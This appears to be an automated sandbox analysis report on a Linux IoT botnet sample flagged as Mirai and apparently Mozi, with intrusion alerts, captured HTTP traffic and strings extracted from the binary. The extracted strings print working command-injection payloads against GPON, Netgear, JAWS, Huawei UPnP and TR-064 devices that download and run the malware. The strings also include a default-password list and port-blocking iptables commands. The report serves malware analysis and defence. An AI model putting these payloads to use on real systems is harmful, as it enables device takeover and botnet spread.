2024-11-28T07:29:00.577973+0100	2029034	1	Web Application Attack	192.168.2.23	54412	28.166.132.104	7574	TCP
2024-11-28T07:29:00.587056+0100	2029034	1	Web Application Attack	192.168.2.23	58576	30.70.91.17	8080	TCP
2024-11-28T07:29:00.591023+0100	2029034	1	Web Application Attack	192.168.2.23	50314	134.97.14.34	49152	TCP
2024-11-28T07:29:00.607211+0100	2029034	1	Web Application Attack	192.168.2.23	60452	182.147.12.93	7574	TCP
2024-11-28T07:29:01.544509+0100	2029034	1	Web Application Attack	192.168.2.23	40932	135.197.45.120	5555	TCP
2024-11-28T07:29:01.545315+0100	2029034	1	Web Application Attack	192.168.2.23	47522	168.216.177.236	80	TCP
2024-11-28T07:29:01.548010+0100	2029034	1	Web Application Attack	192.168.2.23	48576	37.176.230.23	80	TCP
2024-11-28T07:29:01.569841+0100	2029034	1	Web Application Attack	192.168.2.23	37532	14.147.224.29	49152	TCP
2024-11-28T07:29:01.575885+0100	2029034	1	Web Application Attack	192.168.2.23	34394	200.218.252.24	49152	TCP
2024-11-28T07:29:01.619419+0100	2029034	1	Web Application Attack	192.168.2.23	42270	142.53.132.215	49152	TCP
2024-11-28T07:29:02.502841+0100	2029034	1	Web Application Attack	192.168.2.23	59306	120.90.51.115	7574	TCP
2024-11-28T07:29:02.514222+0100	2029034	1	Web Application Attack	192.168.2.23	46718	57.18.210.182	5555	TCP
2024-11-28T07:29:02.530841+0100	2029034	1	Web Application Attack	192.168.2.23	52754	176.1.96.117	80	TCP
2024-11-28T07:29:02.565431+0100	2029034	1	Web Application Attack	192.168.2.23	41272	63.30.95.160	7574	TCP
2024-11-28T07:29:02.568369+0100	2029034	1	Web Application Attack	192.168.2.23	42702	8.196.111.67	7574	TCP
2024-11-28T07:29:02.584200+0100	2029034	1	Web Application Attack	192.168.2.23	47906	205.169.229.199	7574	TCP
2024-11-28T07:29:02.589368+0100	2029034	1	Web Application Attack	192.168.2.23	41182	106.218.209.57	80	TCP
2024-11-28T07:29:02.602979+0100	2029034	1	Web Application Attack	192.168.2.23	59192	150.4.137.148	7574	TCP
2024-11-28T07:29:03.525015+0100	2029034	1	Web Application Attack	192.168.2.23	49696	119.179.80.157	8080	TCP
2024-11-28T07:29:03.544678+0100	2029034	1	Web Application Attack	192.168.2.23	40342	58.119.101.96	7574	TCP
2024-11-28T07:29:03.550153+0100	2029034	1	Web Application Attack	192.168.2.23	39928	103.61.153.120	8080	TCP
2024-11-28T07:29:03.555273+0100	2029034	1	Web Application Attack	192.168.2.23	49378	171.191.190.114	80	TCP
2024-11-28T07:29:03.555686+0100	2029034	1	Web Application Attack	192.168.2.23	46966	200.6.145.229	80	TCP
2024-11-28T07:29:03.558457+0100	2029034	1	Web Application Attack	192.168.2.23	37800	217.160.23.25	80	TCP
2024-11-28T07:29:03.576949+0100	2029034	1	Web Application Attack	192.168.2.23	44042	52.188.254.76	7574	TCP
2024-11-28T07:29:03.582490+0100	2029034	1	Web Application Attack	192.168.2.23	54824	2.199.234.248	80	TCP
2024-11-28T07:29:03.596623+0100	2029034	1	Web Application Attack	192.168.2.23	36656	96.87.223.212	5555	TCP
2024-11-28T07:29:03.605625+0100	2029034	1	Web Application Attack	192.168.2.23	58514	104.67.128.218	5555	TCP
2024-11-28T07:29:04.531514+0100	2029034	1	Web Application Attack	192.168.2.23	36034	104.221.2.197	49152	TCP
2024-11-28T07:29:04.537270+0100	2029034	1	Web Application Attack	192.168.2.23	37824	34.173.168.24	80	TCP
2024-11-28T07:29:04.565729+0100	2029034	1	Web Application Attack	192.168.2.23	57798	118.35.71.138	80	TCP
2024-11-28T07:29:04.575916+0100	2029034	1	Web Application Attack	192.168.2.23	58950	5.197.254.35	80	TCP
2024-11-28T07:29:04.581845+0100	2029034	1	Web Application Attack	192.168.2.23	57404	164.216.166.24	80	TCP
2024-11-28T07:29:04.591173+0100	2029034	1	Web Application Attack	192.168.2.23	38832	195.92.142.27	49152	TCP
2024-11-28T07:29:04.595446+0100	2029034	1	Web Application Attack	192.168.2.23	55420	20.244.167.119	49152	TCP
2024-11-28T07:29:05.501538+0100	2029034	1	Web Application Attack	192.168.2.23	56728	200.166.34.14	80	TCP
2024-11-28T07:29:05.506992+0100	2029034	1	Web Application Attack	192.168.2.23	39352	179.153.247.167	8080	TCP
2024-11-28T07:29:05.520285+0100	2029034	1	Web Application Attack	192.168.2.23	42466	133.69.133.236	8080	TCP
2024-11-28T07:29:05.520651+0100	2029034	1	Web Application Attack	192.168.2.23	58320	33.212.219.23	8080	TCP
2024-11-28T07:29:05.539100+0100	2029034	1	Web Application Attack	192.168.2.23	42816	187.152.16.61	5555	TCP
2024-11-28T07:29:05.558674+0100	2029034	1	Web Application Attack	192.168.2.23	50652	150.60.134.44	5555	TCP
2024-11-28T07:29:05.569910+0100	2029034	1	Web Application Attack	192.168.2.23	36890	15.46.179.177	5555	TCP
2024-11-28T07:29:05.588565+0100	2029034	1	Web Application Attack	192.168.2.23	34798	211.30.199.200	7574	TCP
2024-11-28T07:29:05.601854+0100	2029034	1	Web Application Attack	192.168.2.23	42642	1.96.199.125	80	TCP
2024-11-28T07:29:06.502733+0100	2029034	1	Web Application Attack	192.168.2.23	51926	165.60.171.187	5555	TCP
2024-11-28T07:29:06.534832+0100	2029034	1	Web Application Attack	192.168.2.23	55684	103.248.72.195	5555	TCP
2024-11-28T07:29:06.535206+0100	2029034	1	Web Application Attack	192.168.2.23	37238	32.128.238.5	5555	TCP
2024-11-28T07:29:06.544084+0100	2029034	1	Web Application Attack	192.168.2.23	55860	111.226.30.52	8080	TCP
2024-11-28T07:29:06.566122+0100	2029034	1	Web Application Attack	192.168.2.23	57672	98.240.104.245	8080	TCP
2024-11-28T07:29:06.594872+0100	2029034	1	Web Application Attack	192.168.2.23	49190	45.139.190.143	8080	TCP
2024-11-28T07:29:06.599966+0100	2029034	1	Web Application Attack	192.168.2.23	41706	112.184.37.29	80	TCP
2024-11-28T07:29:06.602510+0100	2029034	1	Web Application Attack	192.168.2.23	35088	121.41.156.213	49152	TCP
2024-11-28T07:29:06.603965+0100	2029034	1	Web Application Attack	192.168.2.23	57144	200.237.182.229	7574	TCP
2024-11-28T07:29:07.501702+0100	2029034	1	Web Application Attack	192.168.2.23	39196	109.43.118.110	80	TCP
2024-11-28T07:29:07.524983+0100	2029034	1	Web Application Attack	192.168.2.23	38390	189.55.0.254	80	TCP
2024-11-28T07:29:07.546279+0100	2029034	1	Web Application Attack	192.168.2.23	45652	90.197.61.137	8080	TCP
2024-11-28T07:29:07.563149+0100	2029034	1	Web Application Attack	192.168.2.23	52080	98.219.179.157	5555	TCP
2024-11-28T07:29:07.576297+0100	2029034	1	Web Application Attack	192.168.2.23	51726	184.196.160.207	8080	TCP
2024-11-28T07:29:07.590054+0100	2029034	1	Web Application Attack	192.168.2.23	48402	130.29.234.87	80	TCP
2024-11-28T07:29:07.590796+0100	2029034	1	Web Application Attack	192.168.2.23	58198	64.151.229.195	5555	TCP
2024-11-28T07:29:07.599357+0100	2029034	1	Web Application Attack	192.168.2.23	43502	33.236.32.144	80	TCP
2024-11-28T07:29:07.604497+0100	2029034	1	Web Application Attack	192.168.2.23	54832	101.251.159.167	80	TCP
2024-11-28T07:29:08.550980+0100	2029034	1	Web Application Attack	192.168.2.23	37214	188.5.181.41	80	TCP
2024-11-28T07:29:08.551392+0100	2029034	1	Web Application Attack	192.168.2.23	42422	102.116.67.9	80	TCP
2024-11-28T07:29:08.553665+0100	2029034	1	Web Application Attack	192.168.2.23	57380	4.229.116.78	8080	TCP
2024-11-28T07:29:08.561124+0100	2029034	1	Web Application Attack	192.168.2.23	43372	163.144.70.149	8080	TCP
2024-11-28T07:29:08.593395+0100	2029034	1	Web Application Attack	192.168.2.23	40420	221.130.16.13	80	TCP
2024-11-28T07:29:08.610645+0100	2029034	1	Web Application Attack	192.168.2.23	34792	33.77.3.169	8080	TCP
2024-11-28T07:29:09.502597+0100	2029034	1	Web Application Attack	192.168.2.23	54254	191.195.132.146	80	TCP
2024-11-28T07:29:09.520260+0100	2029034	1	Web Application Attack	192.168.2.23	34774	175.73.108.170	8080	TCP
2024-11-28T07:29:09.521017+0100	2029034	1	Web Application Attack	192.168.2.23	33092	213.187.115.182	8080	TCP
2024-11-28T07:29:09.521379+0100	2029034	1	Web Application Attack	192.168.2.23	55762	3.218.135.113	80	TCP
2024-11-28T07:29:09.545260+0100	2029034	1	Web Application Attack	192.168.2.23	40450	215.34.57.192	5555	TCP
2024-11-28T07:29:09.556398+0100	2029034	1	Web Application Attack	192.168.2.23	37862	90.52.251.216	8080	TCP
2024-11-28T07:29:09.556773+0100	2029034	1	Web Application Attack	192.168.2.23	46342	5.74.176.130	5555	TCP
2024-11-28T07:29:09.559331+0100	2029034	1	Web Application Attack	192.168.2.23	35096	213.252.65.79	5555	TCP
2024-11-28T07:29:09.584906+0100	2029034	1	Web Application Attack	192.168.2.23	60230	110.148.234.197	49152	TCP
2024-11-28T07:29:09.585282+0100	2029034	1	Web Application Attack	192.168.2.23	36608	159.165.151.135	8080	TCP
2024-11-28T07:29:09.608570+0100	2029034	1	Web Application Attack	192.168.2.23	42018	169.253.246.12	7574	TCP
2024-11-28T07:29:09.609391+0100	2029034	1	Web Application Attack	192.168.2.23	41060	91.61.95.124	8080	TCP
2024-11-28T07:29:10.541097+0100	2029034	1	Web Application Attack	192.168.2.23	51892	70.94.186.116	5555	TCP
2024-11-28T07:29:10.542937+0100	2029034	1	Web Application Attack	192.168.2.23	33572	187.253.227.106	8080	TCP
2024-11-28T07:29:10.544660+0100	2029034	1	Web Application Attack	192.168.2.23	52694	49.167.186.190	80	TCP
2024-11-28T07:29:10.556514+0100	2029034	1	Web Application Attack	192.168.2.23	48494	197.190.42.233	5555	TCP
2024-11-28T07:29:10.559101+0100	2029034	1	Web Application Attack	192.168.2.23	37780	181.247.46.13	49152	TCP
2024-11-28T07:29:10.566163+0100	2029034	1	Web Application Attack	192.168.2.23	45490	213.25.64.57	49152	TCP
2024-11-28T07:29:11.512245+0100	2029034	1	Web Application Attack	192.168.2.23	56972	67.28.77.205	80	TCP
2024-11-28T07:29:11.543468+0100	2029034	1	Web Application Attack	192.168.2.23	36218	52.95.18.143	80	TCP
2024-11-28T07:29:11.549749+0100	2029034	1	Web Application Attack	192.168.2.23	41628	115.81.84.205	80	TCP
2024-11-28T07:29:11.585768+0100	2029034	1	Web Application Attack	192.168.2.23	32792	12.97.253.3	80	TCP
2024-11-28T07:29:11.595898+0100	2029034	1	Web Application Attack	192.168.2.23	35578	117.133.107.180	49152	TCP
2024-11-28T07:29:11.606579+0100	2029034	1	Web Application Attack	192.168.2.23	34464	12.19.214.135	49152	TCP
2024-11-28T07:29:12.449153+0100	2029034	1	Web Application Attack	192.168.2.23	33070	210.216.128.151	8080	TCP
2024-11-28T07:29:12.511978+0100	2029034	1	Web Application Attack	192.168.2.23	44776	183.87.126.0	8080	TCP
2024-11-28T07:29:12.512862+0100	2029034	1	Web Application Attack	192.168.2.23	60954	34.170.202.161	80	TCP
2024-11-28T07:29:12.518531+0100	2029034	1	Web Application Attack	192.168.2.23	57472	55.176.226.125	8080	TCP
2024-11-28T07:29:12.540111+0100	2029034	1	Web Application Attack	192.168.2.23	57132	2.2.202.73	7574	TCP
2024-11-28T07:29:12.572748+0100	2029034	1	Web Application Attack	192.168.2.23	38532	102.23.232.98	49152	TCP
2024-11-28T07:29:12.595258+0100	2029034	1	Web Application Attack	192.168.2.23	55694	73.109.193.191	5555	TCP
2024-11-28T07:29:13.511690+0100	2029034	1	Web Application Attack	192.168.2.23	55280	100.142.210.240	7574	TCP
2024-11-28T07:29:13.561237+0100	2029034	1	Web Application Attack	192.168.2.23	49432	15.59.214.243	7574	TCP
2024-11-28T07:29:13.596786+0100	2029034	1	Web Application Attack	192.168.2.23	49570	125.112.19.22	7574	TCP
2024-11-28T07:29:14.528605+0100	2029034	1	Web Application Attack	192.168.2.23	46734	92.192.162.231	80	TCP
2024-11-28T07:29:14.565630+0100	2029034	1	Web Application Attack	192.168.2.23	59798	112.48.44.0	5555	TCP
2024-11-28T07:29:14.587573+0100	2029034	1	Web Application Attack	192.168.2.23	44646	181.20.68.245	49152	TCP
2024-11-28T07:29:14.603650+0100	2029034	1	Web Application Attack	192.168.2.23	36944	48.235.98.93	80	TCP
2024-11-28T07:29:15.444769+0100	2029034	1	Web Application Attack	192.168.2.23	48048	121.126.110.162	5555	TCP
2024-11-28T07:29:15.503515+0100	2029034	1	Web Application Attack	192.168.2.23	57530	175.166.167.208	80	TCP
2024-11-28T07:29:15.507898+0100	2029034	1	Web Application Attack	192.168.2.23	49372	50.114.132.221	80	TCP
2024-11-28T07:29:15.525558+0100	2029034	1	Web Application Attack	192.168.2.23	36632	66.202.254.252	8080	TCP
2024-11-28T07:29:15.550336+0100	2029034	1	Web Application Attack	192.168.2.23	48326	21.221.5.20	49152	TCP
2024-11-28T07:29:15.553852+0100	2029034	1	Web Application Attack	192.168.2.23	41082	152.141.41.153	80	TCP
2024-11-28T07:29:15.566106+0100	2029034	1	Web Application Attack	192.168.2.23	45294	29.139.64.77	5555	TCP
2024-11-28T07:29:15.578953+0100	2029034	1	Web Application Attack	192.168.2.23	33818	155.239.231.254	8080	TCP
2024-11-28T07:29:15.611410+0100	2029034	1	Web Application Attack	192.168.2.23	40378	36.82.170.59	80	TCP

HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 127.0.0.1:80Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, WorldContent-Length: 118Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: alphapdDate: Thu Nov 28 01:28:59 2024Pragma: no-cacheCache-Control: no-cacheContent-type: text/htmlContent-length: 62Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 66 6f 72 62 69 64 64 65 6e 2e 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: <html><body><h1>The request is forbidden.</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 49Content-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 28 Nov 2024 06:30:29 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: networks.34.dr	String found in binary or memory: http://%s:%d/Mozi.a;chmod
Source: bin.sh.elf, networks.34.dr	String found in binary or memory: http://%s:%d/Mozi.a;sh$
Source: networks.34.dr	String found in binary or memory: http://%s:%d/Mozi.m
Source: bin.sh.elf, networks.34.dr	String found in binary or memory: http://%s:%d/Mozi.m;
Source: bin.sh.elf, networks.34.dr	String found in binary or memory: http://%s:%d/Mozi.m;$
Source: bin.sh.elf, networks.34.dr	String found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
Source: networks.34.dr	String found in binary or memory: http://%s:%d/bin.sh
Source: bin.sh.elf, networks.34.dr	String found in binary or memory: http://%s:%d/bin.sh;chmod
Source: networks.34.dr	String found in binary or memory: http://127.0.0.1
Source: bin.sh.elf, networks.34.dr	String found in binary or memory: http://127.0.0.1sendcmd
Source: bin.sh.elf, networks.34.dr	String found in binary or memory: http://HTTP/1.1
Source: bin.sh.elf, networks.34.dr	String found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
Source: kmod.sh.34.dr	String found in binary or memory: http://git.kernel.org/cgit/utils/kernel/kmod/kmod.git/commit/libkmod/libkmod-module.c?id=fd44a98ae2e
Source: .config.34.dr	String found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
Source: networks.34.dr	String found in binary or memory: http://ipinfo.io/ip
Source: alsa-info.sh.34.dr	String found in binary or memory: http://pastebin.ca)
Source: alsa-info.sh.34.dr	String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
Source: alsa-info.sh.34.dr	String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
Source: bin.sh.elf, networks.34.dr	String found in binary or memory: http://purenetworks.com/HNAP1/
Source: networks.34.dr	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: networks.34.dr	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: bin.sh.elf, networks.34.dr	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
Source: alsa-info.sh.34.dr	String found in binary or memory: http://www.alsa-project.org
Source: alsa-info.sh.34.dr	String found in binary or memory: http://www.alsa-project.org.
Source: alsa-info.sh.34.dr	String found in binary or memory: http://www.alsa-project.org/alsa-info.sh
Source: alsa-info.sh.34.dr	String found in binary or memory: http://www.alsa-project.org/cardinfo-db/
Source: alsa-info.sh.34.dr	String found in binary or memory: http://www.pastebin.ca
Source: alsa-info.sh.34.dr	String found in binary or memory: http://www.pastebin.ca.
Source: alsa-info.sh.34.dr	String found in binary or memory: http://www.pastebin.ca/upload.php

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: /tmp/bin.sh.elf (PID: 6244)

HTML file containing JavaScript created: /usr/networks

Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: bin.sh.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_5c62e6b2 Author: unknown
Source: bin.sh.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_77137320 Author: unknown
Source: bin.sh.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_ac253e4f Author: unknown
Source: 6242.1.00007fb730017000.00007fb730058000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5c62e6b2 Author: unknown
Source: 6242.1.00007fb730017000.00007fb730058000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_77137320 Author: unknown
Source: 6242.1.00007fb730017000.00007fb730058000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ac253e4f Author: unknown
Source: 6240.1.00007fb730017000.00007fb730058000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5c62e6b2 Author: unknown
Source: 6240.1.00007fb730017000.00007fb730058000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_77137320 Author: unknown
Source: 6240.1.00007fb730017000.00007fb730058000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ac253e4f Author: unknown
Source: /usr/networks, type: DROPPED	Matched rule: Linux_Trojan_Mirai_5c62e6b2 Author: unknown
Source: /usr/networks, type: DROPPED	Matched rule: Linux_Trojan_Mirai_77137320 Author: unknown
Source: /usr/networks, type: DROPPED	Matched rule: Linux_Trojan_Mirai_ac253e4f Author: unknown

Source: Initial sample	String containing 'busybox' found: busybox
Source: Initial sample	String containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
Source: Initial sample	String containing 'busybox' found: /bin/busybox cat /bin/ls\|head -n 1
Source: Initial sample	String containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
Source: Initial sample	String containing 'busybox' found: /bin/busybox cat /bin/ls\|more
Source: Initial sample	String containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls\|head -n 1
Source: Initial sample	String containing 'busybox' found: dd bs=52 count=1 if=/bin/ls \|\| cat /bin/ls \|\| while read i; do echo $i; done < /bin/ls \|\| while read i; do echo $i; done < /bin/busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls \|\| /bin/busybox cat /bin/ls \|\| while read i; do printf $i; done < /bin/ls \|\| while read i; do printf $i; done < /bin/busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox chmod 777 .i \|\| (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
Source: Initial sample	String containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i \|\|curl -O http://%s:%d/i \|\|/bin/busybox wget http://%s:%d/i;chmod 777 i \|\|(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh \|\|curl -O http://%s:%d/bin.sh \|\|/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh \|\|(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
Source: Initial sample	String containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i \|\| (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample	String containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i \|\|curl -O http://%s:%d/i \|\|/bin/busybox wget http://%s:%d/i;chmod 777 i \|\|(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>

Source: Initial sample	String containing potential weak password found: admin
Source: Initial sample	String containing potential weak password found: default
Source: Initial sample	String containing potential weak password found: support
Source: Initial sample	String containing potential weak password found: service
Source: Initial sample	String containing potential weak password found: supervisor
Source: Initial sample	String containing potential weak password found: guest
Source: Initial sample	String containing potential weak password found: administrator
Source: Initial sample	String containing potential weak password found: 123456
Source: Initial sample	String containing potential weak password found: 54321
Source: Initial sample	String containing potential weak password found: password
Source: Initial sample	String containing potential weak password found: 12345
Source: Initial sample	String containing potential weak password found: admin1234

Source: Initial sample	Potential command found: GET /c HTTP/1.0
Source: Initial sample	Potential command found: GET %s HTTP/1.1
Source: Initial sample	Potential command found: GET /c
Source: Initial sample	Potential command found: GET /Mozi.6 HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.7 HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.c HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.m HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.x HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.a HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.s HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.r HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.b HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.4 HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.k HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.l HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.p HTTP/1.0
Source: Initial sample	Potential command found: GET /%s HTTP/1.1
Source: Initial sample	Potential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: Initial sample	Potential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: Initial sample	Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
Source: Initial sample	Potential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
Source: Initial sample	Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron

Source: ELF static info symbol of initial sample

.symtab present: no

